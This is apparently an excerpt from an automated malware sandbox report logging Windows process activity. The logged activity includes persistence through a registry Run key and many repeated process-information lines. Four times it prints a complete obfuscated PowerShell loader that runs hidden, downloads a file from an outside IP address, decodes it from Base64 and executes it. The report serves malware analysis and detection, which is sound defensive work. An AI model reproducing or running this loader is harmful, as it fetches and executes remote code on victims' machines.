        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB200800BD pushad ; iretd 6_2_00007FFB200800C1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C545DD push ss; retn 0008h10_2_04C545E2
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C545E7 push ss; retn 0008h10_2_04C545F2
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C545F7 push ss; retn 0008h10_2_04C54602
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C54607 push ss; retn 0008h10_2_04C54612
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C53AE1 push ebx; retf 10_2_04C53AEA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C53AEF push ebx; retf 10_2_04C53AEA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C5A227 push esp; retn 0008h10_2_04C5A231
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232C21AD pushad ; retf 0004h12_2_232C223F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232CE060 push eax; retf 0008h12_2_232CE06D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232CE074 pushfd ; retf 12_2_232CE075
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232C97A1 push es; iretd 12_2_232C97A8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F08CD push ecx; mov dword ptr [esp], ecx12_2_232F08D6
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 14_2_06E667FC push es; retf 14_2_06E667FD
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 14_2_06E6ECCE push 0000006Eh; retf 14_2_06E6ECFA
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 14_2_06E738AE push eax; ret 14_2_06E738B0
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 14_2_06E6EC6C push es; retf 14_2_06E6EC78
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 14_2_06E6E85D push FFFFFFB4h; iretd 14_2_06E6E8AD
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 14_2_06E64DD0 push ebp; retf 14_2_06E64DD1
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 14_2_06E65952 push ecx; retf 14_2_06E65961
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 14_2_06E61922 push eax; iretd 14_2_06E61936
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AA08CD push ecx; mov dword ptr [esp], ecx15_2_04AA08D6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AAA35C push cs; ret 15_2_02AAA35F
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AA40E6 pushfd ; ret 15_2_02AA40E7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02ACC0CF push eax; ret 15_2_02ACC0D1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AB4050 push ebx; ret 15_2_02AB4100
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02ABC6EC push ss; iretd 15_2_02ABC6EF
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AB8648 push edi; retf 15_2_02AB8670
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AC2786 push edi; ret 15_2_02AC279B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AC2790 push edi; ret 15_2_02AC279B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02ABAAC3 push ds; iretd 15_2_02ABAAB8
        Source: C:\Windows\SysWOW64\AtBroker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run S2U4LHJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run S2U4LHJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
